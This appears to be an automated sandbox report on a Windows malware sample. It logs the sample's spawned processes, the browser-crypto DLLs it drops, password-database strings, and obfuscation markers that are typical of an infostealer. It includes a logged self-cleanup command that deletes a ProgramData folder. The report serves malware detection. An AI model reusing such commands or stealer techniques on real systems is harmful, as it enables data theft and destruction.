Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: AKJDGD.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 30%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\GCGHCBKFCF.exe "C:\ProgramData\GCGHCBKFCF.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\GCGHCBKFCF.exe "C:\ProgramData\GCGHCBKFCF.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2500700972.0000000035EBC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2495526270.0000000029FDE000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418A63
PE file contains sections with non-standard names
Source: sql[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060713A push ecx; ret 0_2_0060714D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B71C1 push ecx; ret 0_2_005B71D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006072D8 push ds; retn 0003h 0_2_0060738D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060739E push ds; retn 0003h 0_2_0060738D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00607454 push ds; retf 0003h 0_2_00607455
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600911 push 3BFFFFFFh; retf 0_2_00600916
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006099ED push 0000004Ch; iretd 0_2_006099FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F5DAD push ecx; ret 0_2_005F5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042F262 push ecx; ret 1_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00422E59 push esi; ret 1_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DED5 push ecx; ret 1_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00432715 push 0000004Ch; iretd 1_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB536 push ecx; ret 1_2_6CADB549
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003071C1 push ecx; ret 8_2_003071D4
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\GCGHCBKFCF.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\GCGHCBKFCF.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
